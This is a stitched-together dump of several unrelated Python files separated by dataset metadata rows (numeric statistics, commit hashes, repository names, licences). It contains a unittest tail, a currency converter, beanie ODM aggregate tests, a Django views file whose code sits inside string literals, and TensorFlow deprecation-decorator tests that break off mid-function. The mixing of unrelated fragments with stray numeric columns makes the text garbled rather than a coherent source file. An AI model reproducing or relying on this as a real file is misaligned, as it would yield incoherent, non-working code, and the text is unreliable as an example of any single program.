    self.assertPublishedMany(publish_mock, metrics)
##########################################################################
# Allow running this test module directly (e.g. "python <file>.py").
if __name__ == "__main__":
    unittest.main()
| 38.18913
| 90
| 0.605396
| 1,852
| 17,567
| 5.515119
| 0.12473
| 0.043078
| 0.066967
| 0.089289
| 0.845506
| 0.828079
| 0.806932
| 0.775798
| 0.775798
| 0.770805
| 0
| 0.05871
| 0.265042
| 17,567
| 459
| 91
| 38.272331
| 0.732399
| 0.029943
| 0
| 0.714697
| 0
| 0
| 0.355315
| 0.290025
| 0
| 0
| 0
| 0
| 0.057637
| 1
| 0.040346
| false
| 0.002882
| 0.023055
| 0
| 0.066282
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d48d8c9e7d1e33b3a265b09b602c2ec5e37126d9
| 101
|
py
|
Python
|
Ex03AP2/converter.py
|
icaromachado/AP2UNIGRANRIO
|
e7c1200463deeabd020a90ddc7f31764c7f3806a
|
[
"MIT"
] | null | null | null |
Ex03AP2/converter.py
|
icaromachado/AP2UNIGRANRIO
|
e7c1200463deeabd020a90ddc7f31764c7f3806a
|
[
"MIT"
] | null | null | null |
Ex03AP2/converter.py
|
icaromachado/AP2UNIGRANRIO
|
e7c1200463deeabd020a90ddc7f31764c7f3806a
|
[
"MIT"
] | null | null | null |
def dolar(n, rate=5.56):
    """Convert an amount in BRL (reais) to US dollars.

    Args:
        n: Amount in BRL.
        rate: BRL per USD. Defaults to 5.56, the original hard-coded rate,
            so existing callers are unaffected.

    Returns:
        The equivalent amount in USD (float).
    """
    return n / rate
def euro(n, rate=6.02):
    """Convert an amount in BRL (reais) to euros.

    Args:
        n: Amount in BRL.
        rate: BRL per EUR. Defaults to 6.02, the original hard-coded rate,
            so existing callers are unaffected.

    Returns:
        The equivalent amount in EUR (float).
    """
    return n / rate
def libra(n, rate=6.92):
    """Convert an amount in BRL (reais) to pounds sterling.

    Args:
        n: Amount in BRL.
        rate: BRL per GBP. Defaults to 6.92, the original hard-coded rate,
            so existing callers are unaffected.

    Returns:
        The equivalent amount in GBP (float).
    """
    return n / rate
| 14.428571
| 19
| 0.554455
| 21
| 101
| 2.666667
| 0.52381
| 0.375
| 0.428571
| 0.321429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126761
| 0.29703
| 101
| 6
| 20
| 16.833333
| 0.661972
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
d4f5369434750eeb290bb65a2fe60608ca2bd6e5
| 2,176
|
py
|
Python
|
tests/odm/query/test_aggregate_methods.py
|
yo-mo/beanie
|
1641dd81be64dd1dc11af667deb2e50feb2de2be
|
[
"Apache-2.0"
] | 574
|
2021-03-16T12:49:12.000Z
|
2022-03-30T11:45:33.000Z
|
tests/odm/query/test_aggregate_methods.py
|
yo-mo/beanie
|
1641dd81be64dd1dc11af667deb2e50feb2de2be
|
[
"Apache-2.0"
] | 148
|
2021-03-16T22:02:37.000Z
|
2022-03-31T21:04:47.000Z
|
tests/odm/query/test_aggregate_methods.py
|
yo-mo/beanie
|
1641dd81be64dd1dc11af667deb2e50feb2de2be
|
[
"Apache-2.0"
] | 53
|
2021-03-16T21:53:14.000Z
|
2022-03-31T12:51:51.000Z
|
from tests.odm.models import Sample
async def test_sum(preset_documents, session):
    """Sum of `increment` over Samples with integer == 1 is 12."""
    criteria = Sample.integer == 1
    total = await Sample.find_many(criteria).sum(Sample.increment)
    assert total == 12
    # Same aggregation, explicitly passing the session through.
    total = await Sample.find_many(criteria).sum(
        Sample.increment, session=session
    )
    assert total == 12
async def test_sum_without_docs(session):
    """With no matching documents, sum() yields None."""
    criteria = Sample.integer == 1
    total = await Sample.find_many(criteria).sum(Sample.increment)
    assert total is None
    # Same aggregation, explicitly passing the session through.
    total = await Sample.find_many(criteria).sum(
        Sample.increment, session=session
    )
    assert total is None
async def test_avg(preset_documents, session):
    """Average of `increment` over Samples with integer == 1 is 4."""
    criteria = Sample.integer == 1
    average = await Sample.find_many(criteria).avg(Sample.increment)
    assert average == 4
    # Same aggregation, explicitly passing the session through.
    average = await Sample.find_many(criteria).avg(
        Sample.increment, session=session
    )
    assert average == 4
async def test_avg_without_docs(session):
    """With no matching documents, avg() yields None."""
    criteria = Sample.integer == 1
    average = await Sample.find_many(criteria).avg(Sample.increment)
    assert average is None
    # Same aggregation, explicitly passing the session through.
    average = await Sample.find_many(criteria).avg(
        Sample.increment, session=session
    )
    assert average is None
async def test_max(preset_documents, session):
    """Maximum of `increment` over Samples with integer == 1 is 5."""
    criteria = Sample.integer == 1
    largest = await Sample.find_many(criteria).max(Sample.increment)
    assert largest == 5
    # Same aggregation, explicitly passing the session through.
    largest = await Sample.find_many(criteria).max(
        Sample.increment, session=session
    )
    assert largest == 5
async def test_max_without_docs(session):
    """With no matching documents, max() yields None."""
    criteria = Sample.integer == 1
    largest = await Sample.find_many(criteria).max(Sample.increment)
    assert largest is None
    # Same aggregation, explicitly passing the session through.
    largest = await Sample.find_many(criteria).max(
        Sample.increment, session=session
    )
    assert largest is None
async def test_min(preset_documents, session):
    """Minimum of `increment` over Samples with integer == 1 is 3."""
    criteria = Sample.integer == 1
    smallest = await Sample.find_many(criteria).min(Sample.increment)
    assert smallest == 3
    # Same aggregation, explicitly passing the session through.
    smallest = await Sample.find_many(criteria).min(
        Sample.increment, session=session
    )
    assert smallest == 3
async def test_min_without_docs(session):
    """With no matching documents, min() yields None."""
    criteria = Sample.integer == 1
    smallest = await Sample.find_many(criteria).min(Sample.increment)
    assert smallest is None
    # Same aggregation, explicitly passing the session through.
    smallest = await Sample.find_many(criteria).min(
        Sample.increment, session=session
    )
    assert smallest is None
| 22.666667
| 73
| 0.670956
| 310
| 2,176
| 4.593548
| 0.103226
| 0.067416
| 0.134831
| 0.179775
| 0.912921
| 0.912921
| 0.912921
| 0.912921
| 0.908708
| 0.908708
| 0
| 0.015312
| 0.219669
| 2,176
| 95
| 74
| 22.905263
| 0.823322
| 0
| 0
| 0.701754
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.280702
| 1
| 0
| false
| 0
| 0.017544
| 0
| 0.017544
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0791df26278f5de81917e6b733dc06d5ba3114ab
| 4,484
|
py
|
Python
|
sample_1/views.py
|
JordanEC/django-rest-and-angular
|
571eb2a7d966c2b7f1f520a764420207387709cd
|
[
"MIT"
] | null | null | null |
sample_1/views.py
|
JordanEC/django-rest-and-angular
|
571eb2a7d966c2b7f1f520a764420207387709cd
|
[
"MIT"
] | null | null | null |
sample_1/views.py
|
JordanEC/django-rest-and-angular
|
571eb2a7d966c2b7f1f520a764420207387709cd
|
[
"MIT"
] | null | null | null |
from django.http import Http404
from django.shortcuts import render
# Create your views here.
from rest_framework import status, permissions, generics
from rest_framework.decorators import api_view, permission_classes
from rest_framework.response import Response
from rest_framework.views import APIView
from .models import *
from .serializers import *
"""
class AuthorList(APIView):
@permission_classes((permissions.AllowAny,))
def get(self, request, format=None):
authors = Author.objects.all()
serializer = AuthorSerializer(authors, many=True)
return Response(serializer.data)
@permission_classes((permissions.IsAuthenticated,))
def post(self, request, format=None):
serializer = AuthorSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class AuthorDetail(APIView):
@permission_classes((permissions.AllowAny,))
def get_object(self, pk):
try:
return Author.objects.get(pk=pk)
except Author.DoesNotExist:
raise Http404
@permission_classes((permissions.AllowAny,))
def get(self, request, pk, format=None):
author = self.get_object(pk)
serializer = AuthorSerializer(author)
return Response(serializer.data)
@permission_classes((permissions.IsAuthenticated,))
def put(self, request, pk, format=None):
author = self.get_object(pk)
serializer = AuthorSerializer(author, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@permission_classes((permissions.IsAuthenticated,))
def delete(self, request, pk, format=None):
author = self.get_object(pk)
author.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
class BookList(APIView):
@permission_classes((permissions.AllowAny,))
def get(self, request, format=None):
books = Author.objects.all()
serializer = BookSerializer(books, many=True)
return Response(serializer.data)
@permission_classes((permissions.IsAuthenticated,))
def post(self, request, format=None):
serializer = BookSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class BookDetail(APIView):
@permission_classes((permissions.AllowAny,))
def get_object(self, pk):
try:
return Book.objects.get(pk=pk)
except Book.DoesNotExist:
raise Http404
@permission_classes((permissions.AllowAny,))
def get(self, request, pk, format=None):
book = self.get_object(pk)
serializer = AuthorSerializer(book)
return Response(serializer.data)
@permission_classes((permissions.IsAuthenticated,))
def put(self, request, pk, format=None):
book = self.get_object(pk)
serializer = AuthorSerializer(book, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@permission_classes((permissions.IsAuthenticated,))
def delete(self, request, pk, format=None):
book = self.get_object(pk)
book.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
"""
"""
class AuthorList(generics.ListCreateAPIView):
queryset = Author.objects.all()
serializer_class = AuthorSerializer
class AuthorDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = Author.objects.all()
serializer_class = AuthorSerializer
class BookList(generics.ListCreateAPIView):
queryset = Book.objects.all()
serializer_class = BookSerializer
class BookDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = Book.objects.all()
serializer_class = BookSerializer
"""
"""
class UserList(generics.ListAPIView):
queryset = User.objects.all()
serializer_class = UserSerializer
class UserDetail(generics.RetrieveAPIView):
queryset = User.objects.all()
serializer_class = UserSerializer
"""
| 33.214815
| 78
| 0.704059
| 476
| 4,484
| 6.510504
| 0.170168
| 0.063246
| 0.108422
| 0.072281
| 0.764117
| 0.75121
| 0.75121
| 0.718296
| 0.643433
| 0.643433
| 0
| 0.009159
| 0.196476
| 4,484
| 135
| 79
| 33.214815
| 0.850958
| 0.005129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
07d6bd6a48f513f6113cdf27b5108377596ba627
| 27,116
|
py
|
Python
|
tensorflow/python/util/deprecation_test.py
|
AlexChrisF/udacity
|
b7f85a74058fc63ccb7601c418450ab934ef5953
|
[
"Apache-2.0"
] | 65
|
2016-09-26T01:30:40.000Z
|
2021-08-11T17:00:41.000Z
|
tensorflow/python/util/deprecation_test.py
|
AlexChrisF/udacity
|
b7f85a74058fc63ccb7601c418450ab934ef5953
|
[
"Apache-2.0"
] | 7
|
2017-07-13T09:40:59.000Z
|
2019-04-08T22:46:51.000Z
|
tensorflow/python/util/deprecation_test.py
|
AlexChrisF/udacity
|
b7f85a74058fc63ccb7601c418450ab934ef5953
|
[
"Apache-2.0"
] | 11
|
2017-08-17T05:52:35.000Z
|
2021-06-19T04:39:45.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""tensor_util tests."""
# pylint: disable=unused-import
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
class DeprecationTest(test.TestCase):
  """Tests for deprecation.deprecated on functions, methods and properties.

  Each test checks two things: the wrapped callable's __doc__ gains the
  deprecation notice, and calling it logs exactly one warning mentioning
  the date and update instructions.
  """

  def _assert_subset(self, expected_subset, actual_set):
    # Helper: fails unless every element of expected_subset is in actual_set.
    self.assertTrue(
        actual_set.issuperset(expected_subset),
        msg="%s is not a superset of %s." % (actual_set, expected_subset))

  def test_deprecated_illegal_args(self):
    """Missing/malformed dates and empty instructions are rejected."""
    instructions = "This is how you update..."
    with self.assertRaisesRegexp(ValueError, "date"):
      deprecation.deprecated(None, instructions)
    with self.assertRaisesRegexp(ValueError, "date"):
      deprecation.deprecated("", instructions)
    with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"):
      deprecation.deprecated("07-04-2016", instructions)
    date = "2016-07-04"
    with self.assertRaisesRegexp(ValueError, "instructions"):
      deprecation.deprecated(date, None)
    with self.assertRaisesRegexp(ValueError, "instructions"):
      deprecation.deprecated(date, "")

  @test.mock.patch.object(logging, "warning", autospec=True)
  def test_static_fn_with_doc(self, mock_warning):
    """Multi-line docstrings get the notice spliced before the Args section."""
    date = "2016-07-04"
    instructions = "This is how you update..."

    @deprecation.deprecated(date, instructions)
    def _fn(arg0, arg1):
      """fn doc.

      Args:
        arg0: Arg 0.
        arg1: Arg 1.

      Returns:
        Sum of args.
      """
      return arg0 + arg1

    # Assert function docs are properly updated.
    self.assertEqual("_fn", _fn.__name__)
    self.assertEqual(
        "fn doc. (deprecated)"
        "\n"
        "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
        "\nInstructions for updating:\n%s"
        "\n"
        "\nArgs:"
        "\n  arg0: Arg 0."
        "\n  arg1: Arg 1."
        "\n"
        "\nReturns:"
        "\n  Sum of args." % (date, instructions), _fn.__doc__)

    # Assert calling new fn issues log warning.
    self.assertEqual(3, _fn(1, 2))
    self.assertEqual(1, mock_warning.call_count)
    (args, _) = mock_warning.call_args
    self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
    self._assert_subset(set([date, instructions]), set(args[1:]))

  @test.mock.patch.object(logging, "warning", autospec=True)
  def test_static_fn_with_one_line_doc(self, mock_warning):
    """One-line docstrings still get the notice appended."""
    date = "2016-07-04"
    instructions = "This is how you update..."

    @deprecation.deprecated(date, instructions)
    def _fn(arg0, arg1):
      """fn doc."""
      return arg0 + arg1

    # Assert function docs are properly updated.
    self.assertEqual("_fn", _fn.__name__)
    self.assertEqual(
        "fn doc. (deprecated)"
        "\n"
        "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
        "\nInstructions for updating:\n%s" % (date, instructions), _fn.__doc__)

    # Assert calling new fn issues log warning.
    self.assertEqual(3, _fn(1, 2))
    self.assertEqual(1, mock_warning.call_count)
    (args, _) = mock_warning.call_args
    self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
    self._assert_subset(set([date, instructions]), set(args[1:]))

  @test.mock.patch.object(logging, "warning", autospec=True)
  def test_static_fn_no_doc(self, mock_warning):
    """Functions without a docstring get a generated one."""
    date = "2016-07-04"
    instructions = "This is how you update..."

    @deprecation.deprecated(date, instructions)
    def _fn(arg0, arg1):
      return arg0 + arg1

    # Assert function docs are properly updated.
    self.assertEqual("_fn", _fn.__name__)
    self.assertEqual(
        "DEPRECATED FUNCTION"
        "\n"
        "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
        "\nInstructions for updating:"
        "\n%s" % (date, instructions), _fn.__doc__)

    # Assert calling new fn issues log warning.
    self.assertEqual(3, _fn(1, 2))
    self.assertEqual(1, mock_warning.call_count)
    (args, _) = mock_warning.call_args
    self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
    self._assert_subset(set([date, instructions]), set(args[1:]))

  @test.mock.patch.object(logging, "warning", autospec=True)
  def test_instance_fn_with_doc(self, mock_warning):
    """Instance methods: doc update plus one warning on call."""
    date = "2016-07-04"
    instructions = "This is how you update..."

    class _Object(object):

      # NOTE(review): "__init" (missing trailing underscores) is never
      # invoked; kept as-is from the original.
      def __init(self):
        pass

      @deprecation.deprecated(date, instructions)
      def _fn(self, arg0, arg1):
        """fn doc.

        Args:
          arg0: Arg 0.
          arg1: Arg 1.

        Returns:
          Sum of args.
        """
        return arg0 + arg1

    # Assert function docs are properly updated.
    self.assertEqual(
        "fn doc. (deprecated)"
        "\n"
        "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
        "\nInstructions for updating:\n%s"
        "\n"
        "\nArgs:"
        "\n  arg0: Arg 0."
        "\n  arg1: Arg 1."
        "\n"
        "\nReturns:"
        "\n  Sum of args." % (date, instructions),
        getattr(_Object, "_fn").__doc__)

    # Assert calling new fn issues log warning.
    self.assertEqual(3, _Object()._fn(1, 2))
    self.assertEqual(1, mock_warning.call_count)
    (args, _) = mock_warning.call_args
    self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
    self._assert_subset(set([date, instructions]), set(args[1:]))

  @test.mock.patch.object(logging, "warning", autospec=True)
  def test_instance_fn_with_one_line_doc(self, mock_warning):
    """Instance method with one-line docstring gets the notice appended."""
    date = "2016-07-04"
    instructions = "This is how you update..."

    class _Object(object):

      def __init(self):
        pass

      @deprecation.deprecated(date, instructions)
      def _fn(self, arg0, arg1):
        """fn doc."""
        return arg0 + arg1

    # Assert function docs are properly updated.
    self.assertEqual(
        "fn doc. (deprecated)"
        "\n"
        "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
        "\nInstructions for updating:\n%s" % (date, instructions),
        getattr(_Object, "_fn").__doc__)

    # Assert calling new fn issues log warning.
    self.assertEqual(3, _Object()._fn(1, 2))
    self.assertEqual(1, mock_warning.call_count)
    (args, _) = mock_warning.call_args
    self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
    self._assert_subset(set([date, instructions]), set(args[1:]))

  @test.mock.patch.object(logging, "warning", autospec=True)
  def test_instance_fn_no_doc(self, mock_warning):
    """Instance method without docstring gets a generated one."""
    date = "2016-07-04"
    instructions = "This is how you update..."

    class _Object(object):

      def __init(self):
        pass

      @deprecation.deprecated(date, instructions)
      def _fn(self, arg0, arg1):
        return arg0 + arg1

    # Assert function docs are properly updated.
    self.assertEqual(
        "DEPRECATED FUNCTION"
        "\n"
        "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
        "\nInstructions for updating:"
        "\n%s" % (date, instructions), getattr(_Object, "_fn").__doc__)

    # Assert calling new fn issues log warning.
    self.assertEqual(3, _Object()._fn(1, 2))
    self.assertEqual(1, mock_warning.call_count)
    (args, _) = mock_warning.call_args
    self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
    self._assert_subset(set([date, instructions]), set(args[1:]))

  def test_prop_wrong_order(self):
    """@deprecated above @property is rejected with a helpful error."""
    with self.assertRaisesRegexp(
        ValueError,
        "make sure @property appears before @deprecated in your source code"):
      # pylint: disable=unused-variable
      class _Object(object):

        def __init(self):
          pass

        @deprecation.deprecated("2016-07-04", "Instructions.")
        @property
        def _prop(self):
          return "prop_wrong_order"

  @test.mock.patch.object(logging, "warning", autospec=True)
  def test_prop_with_doc(self, mock_warning):
    """Deprecated property: doc update plus one warning on access."""
    date = "2016-07-04"
    instructions = "This is how you update..."

    class _Object(object):

      def __init(self):
        pass

      @property
      @deprecation.deprecated(date, instructions)
      def _prop(self):
        """prop doc.

        Returns:
          String.
        """
        return "prop_with_doc"

    # Assert function docs are properly updated.
    self.assertEqual(
        "prop doc. (deprecated)"
        "\n"
        "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
        "\nInstructions for updating:"
        "\n%s"
        "\n"
        "\nReturns:"
        "\n  String." % (date, instructions), getattr(_Object, "_prop").__doc__)

    # Assert calling new fn issues log warning.
    self.assertEqual("prop_with_doc", _Object()._prop)
    self.assertEqual(1, mock_warning.call_count)
    (args, _) = mock_warning.call_args
    self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
    self._assert_subset(set([date, instructions]), set(args[1:]))

  @test.mock.patch.object(logging, "warning", autospec=True)
  def test_prop_no_doc(self, mock_warning):
    """Deprecated property without docstring gets a generated one."""
    date = "2016-07-04"
    instructions = "This is how you update..."

    class _Object(object):

      def __init(self):
        pass

      @property
      @deprecation.deprecated(date, instructions)
      def _prop(self):
        return "prop_no_doc"

    # Assert function docs are properly updated.
    self.assertEqual(
        "DEPRECATED FUNCTION"
        "\n"
        "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s."
        "\nInstructions for updating:"
        "\n%s" % (date, instructions), getattr(_Object, "_prop").__doc__)

    # Assert calling new fn issues log warning.
    self.assertEqual("prop_no_doc", _Object()._prop)
    self.assertEqual(1, mock_warning.call_count)
    (args, _) = mock_warning.call_args
    self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
    self._assert_subset(set([date, instructions]), set(args[1:]))
class DeprecatedArgsTest(test.TestCase):
def _assert_subset(self, expected_subset, actual_set):
  """Fail unless every element of expected_subset appears in actual_set."""
  covered = actual_set.issuperset(expected_subset)
  failure_msg = "%s is not a superset of %s." % (actual_set, expected_subset)
  self.assertTrue(covered, msg=failure_msg)
def test_deprecated_illegal_args(self):
  """deprecated_args rejects bad dates, empty instructions, and no names."""
  instructions = "This is how you update..."
  date = "2016-07-04"
  # Missing or empty date.
  for bad_date in [None, ""]:
    with self.assertRaisesRegexp(ValueError, "date"):
      deprecation.deprecated_args(bad_date, instructions, "deprecated")
  # Date not in ISO YYYY-MM-DD form.
  with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"):
    deprecation.deprecated_args("07-04-2016", instructions, "deprecated")
  # Missing or empty instructions.
  for bad_instructions in [None, ""]:
    with self.assertRaisesRegexp(ValueError, "instructions"):
      deprecation.deprecated_args(date, bad_instructions, "deprecated")
  # No deprecated argument names supplied at all.
  with self.assertRaisesRegexp(ValueError, "argument"):
    deprecation.deprecated_args(date, instructions)
def test_deprecated_missing_args(self):
  """Naming a nonexistent argument in deprecated_args raises ValueError."""
  deprecation_date = "2016-07-04"
  update_instructions = "This is how you update..."

  def _fn(arg0, arg1, deprecated=None):
    return arg0 + arg1 if deprecated else arg1 + arg0

  # "missing" is not an argument of _fn, so decoration itself must fail.
  with self.assertRaisesRegexp(ValueError, "not present.*\\['missing'\\]"):
    deprecation.deprecated_args(deprecation_date, update_instructions,
                                "missing")(_fn)
@test.mock.patch.object(logging, "warning", autospec=True)
def test_static_fn_with_doc(self, mock_warning):
  """Deprecated-args notice is spliced into a multi-line docstring."""
  date = "2016-07-04"
  instructions = "This is how you update..."

  @deprecation.deprecated_args(date, instructions, "deprecated")
  def _fn(arg0, arg1, deprecated=True):
    """fn doc.

    Args:
      arg0: Arg 0.
      arg1: Arg 1.
      deprecated: Deprecated!

    Returns:
      Sum of args.
    """
    return arg0 + arg1 if deprecated else arg1 + arg0

  # Assert function docs are properly updated.
  self.assertEqual("_fn", _fn.__name__)
  self.assertEqual(
      "fn doc. (deprecated arguments)"
      "\n"
      "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s."
      "\nInstructions for updating:\n%s"
      "\n"
      "\nArgs:"
      "\n  arg0: Arg 0."
      "\n  arg1: Arg 1."
      "\n  deprecated: Deprecated!"
      "\n"
      "\nReturns:"
      "\n  Sum of args." % (date, instructions), _fn.__doc__)

  # Assert calls without the deprecated argument log nothing.
  self.assertEqual(3, _fn(1, 2))
  self.assertEqual(0, mock_warning.call_count)

  # Assert calls with the deprecated argument log a warning.
  self.assertEqual(3, _fn(1, 2, True))
  self.assertEqual(1, mock_warning.call_count)
  (args, _) = mock_warning.call_args
  self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
  self._assert_subset(set([date, instructions]), set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_static_fn_with_one_line_doc(self, mock_warning):
  """One-line docstrings still get the deprecated-args notice appended."""
  date = "2016-07-04"
  instructions = "This is how you update..."

  @deprecation.deprecated_args(date, instructions, "deprecated")
  def _fn(arg0, arg1, deprecated=True):
    """fn doc."""
    return arg0 + arg1 if deprecated else arg1 + arg0

  # Assert function docs are properly updated.
  self.assertEqual("_fn", _fn.__name__)
  self.assertEqual(
      "fn doc. (deprecated arguments)"
      "\n"
      "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s."
      "\nInstructions for updating:\n%s" % (date, instructions), _fn.__doc__)

  # Assert calls without the deprecated argument log nothing.
  self.assertEqual(3, _fn(1, 2))
  self.assertEqual(0, mock_warning.call_count)

  # Assert calls with the deprecated argument log a warning.
  self.assertEqual(3, _fn(1, 2, True))
  self.assertEqual(1, mock_warning.call_count)
  (args, _) = mock_warning.call_args
  self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
  self._assert_subset(set([date, instructions]), set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_static_fn_no_doc(self, mock_warning):
  """Functions without a docstring get a generated deprecated-args one."""
  date = "2016-07-04"
  instructions = "This is how you update..."

  @deprecation.deprecated_args(date, instructions, "deprecated")
  def _fn(arg0, arg1, deprecated=True):
    return arg0 + arg1 if deprecated else arg1 + arg0

  # Assert function docs are properly updated.
  self.assertEqual("_fn", _fn.__name__)
  self.assertEqual(
      "DEPRECATED FUNCTION ARGUMENTS"
      "\n"
      "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s."
      "\nInstructions for updating:"
      "\n%s" % (date, instructions), _fn.__doc__)

  # Assert calls without the deprecated argument log nothing.
  self.assertEqual(3, _fn(1, 2))
  self.assertEqual(0, mock_warning.call_count)

  # Assert calls with the deprecated argument log a warning.
  self.assertEqual(3, _fn(1, 2, True))
  self.assertEqual(1, mock_warning.call_count)
  (args, _) = mock_warning.call_args
  self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
  self._assert_subset(set([date, instructions]), set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_varargs(self, mock_warning):
  """Deprecating a *varargs parameter warns only when extras are passed."""
  date = "2016-07-04"
  instructions = "This is how you update..."

  @deprecation.deprecated_args(date, instructions, "deprecated")
  def _fn(arg0, arg1, *deprecated):
    return arg0 + arg1 if deprecated else arg1 + arg0

  # No extra positionals -> nothing logged.
  self.assertEqual(3, _fn(1, 2))
  self.assertEqual(0, mock_warning.call_count)

  # Extra positionals land in *deprecated -> one warning.
  self.assertEqual(3, _fn(1, 2, True, False))
  self.assertEqual(1, mock_warning.call_count)
  args = mock_warning.call_args[0]
  self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
  self._assert_subset({date, instructions}, set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_kwargs(self, mock_warning):
  """Deprecating a **kwargs parameter warns only when kwargs are passed."""
  date = "2016-07-04"
  instructions = "This is how you update..."

  @deprecation.deprecated_args(date, instructions, "deprecated")
  def _fn(arg0, arg1, **deprecated):
    return arg0 + arg1 if deprecated else arg1 + arg0

  # No keyword extras -> nothing logged.
  self.assertEqual(3, _fn(1, 2))
  self.assertEqual(0, mock_warning.call_count)

  # Keyword extras land in **deprecated -> one warning.
  self.assertEqual(3, _fn(1, 2, a=True, b=False))
  self.assertEqual(1, mock_warning.call_count)
  args = mock_warning.call_args[0]
  self.assertRegexpMatches(args[0], r"deprecated and will be removed after")
  self._assert_subset({date, instructions}, set(args[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_positional_and_named(self, mock_warning):
  """Each deprecated argument, positional or named, logs its own warning."""
  date = "2016-07-04"
  instructions = "This is how you update..."

  @deprecation.deprecated_args(date, instructions, "d1", "d2")
  def _fn(arg0, d1=None, arg1=2, d2=None):
    return arg0 + arg1 if d1 else arg1 + arg0 if d2 else arg0 * arg1

  # Assert calls without the deprecated arguments log nothing.
  self.assertEqual(2, _fn(1, arg1=2))
  self.assertEqual(0, mock_warning.call_count)

  # Assert calls with the deprecated arguments log one warning each.
  self.assertEqual(2, _fn(1, None, 2, d2=False))
  self.assertEqual(2, mock_warning.call_count)
  (args1, _) = mock_warning.call_args_list[0]
  self.assertRegexpMatches(args1[0], r"deprecated and will be removed after")
  self._assert_subset(set([date, instructions, "d1"]), set(args1[1:]))
  (args2, _) = mock_warning.call_args_list[1]
  # Bug fix: the second warning's message was previously (and wrongly)
  # re-checked against args1; it must be checked against args2.
  self.assertRegexpMatches(args2[0], r"deprecated and will be removed after")
  self._assert_subset(set([date, instructions, "d2"]), set(args2[1:]))
@test.mock.patch.object(logging, "warning", autospec=True)
def test_positional_and_named_with_ok_vals(self, mock_warning):
  """Deprecated arguments with declared ok-values stay silent on those values."""
  date = "2016-07-04"
  instructions = "This is how you update..."

  @deprecation.deprecated_args(date, instructions, ("d1", None),
